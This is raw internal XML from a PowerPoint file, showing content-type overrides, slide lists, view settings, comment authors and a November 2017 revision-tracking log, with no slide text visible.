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6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1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9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide2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20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+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8" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId27"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId28"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="323" r:id="rId2"/>
    <p:sldId id="277" r:id="rId3"/>
    <p:sldId id="318" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="304" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="303" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="315" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="308" r:id="rId15"/>
    <p:sldId id="310" r:id="rId16"/>
    <p:sldId id="306" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="320" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="286" r:id="rId24"/>
    <p:sldId id="317" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9144000" type="letter"/>
  <p:notesSz cx="6781800" cy="90678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688" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="1440" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="2880" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3600" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:sldGuideLst>
    </p:ext>
    <p:ext uri="{2D200454-40CA-4A62-9FC3-DE9A4176ACB9}">
      <p15:notesGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2857" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2137"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orsten" initials="T" lastIdx="96" clrIdx="0"/>
  <p:cmAuthor id="1" name="DorisTorsten" initials="D" lastIdx="0" clrIdx="1"/>
  <p:cmAuthor id="2" name="Andrew van der Stock" initials="AS" lastIdx="6" clrIdx="2">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="office@enil.us" initials="o" lastIdx="1" clrIdx="3">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="4" name="Andrew van der Stock" initials="AvdS" lastIdx="1" clrIdx="4">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3276B"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="FC9803"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="B93A32"/>
    <a:srgbClr val="672E3B"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="B3D6AC"/>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809" autoAdjust="0"/>
    <p:restoredTop sz="95096" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="1020" y="-552"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2688"/>
        <p:guide pos="1440"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz" pos="360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10" d="100"/>
        <a:sy n="110" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="51" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="-2802" y="-108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2857"/>
        <p:guide pos="2137"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:notesViewPr>
  <p:gridSpacing cx="45005" cy="45005"/>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36"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abriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:52:40.806" v="473" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:53:26.885" v="476" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Gabriel Lawrence" userId="4d24c77f19546939" providerId="LiveId" clId="{8840B8BB-2388-403A-87C8-D7EE3254AED6}" dt="2017-11-10T00:30:09.753" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="137" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T21:11:43.663" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3544603407" sldId="303"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T21:11:43.663" v="2" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:06:30.787" v="277" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3458964653" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:06:30.787" v="277" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addCm modCm">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T22:27:07.206" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370214010" sldId="307"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:07:22.198" v="48" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1310475506" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:07:22.198" v="48" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1310475506" sldId="308"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:05:22.473" v="44" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:05:22.473" v="44" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:10:22.255" v="279" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872923206" sldId="318"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:10:22.255" v="279" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:graphicFrameMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:56:59.255" v="156" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1698158142" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:54:53.027" v="51" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:45.268" v="89" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:53.509" v="92" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:51.510" v="91" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:48.735" v="90" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="14" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:24.799" v="87" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:56:59.255" v="156" actId="12"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1107843752" sldId="322"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T00:51:14.149" v="8" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323774989" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T00:51:14.149" v="8" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2323774989" sldId="323"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld modNotesMaster modHandout">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:46:00.142" v="3537" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:18.710" v="2922" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="268"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:18.710" v="2922" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="268"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:20:28.372" v="3037" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="272"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:20:28.372" v="3037" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="272"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:19:46.995" v="3029" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="272"/>
            <ac:graphicFrameMk id="10" creationId="{006EF41C-22F0-4CD0-98DC-529189A47945}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:16:22.467" v="2991" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="274"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:16:22.467" v="2991" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="274"/>
            <ac:graphicFrameMk id="12" creationId="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="277"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:graphicFrameMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:graphicFrameMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:40:41.969" v="2253" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:24:27.780" v="2138" actId="120"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:40:41.969" v="2253" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:46:51.408" v="2141" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="281"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:46:51.408" v="2141" actId="113"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="281"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:37:10.988" v="2233" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="285"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
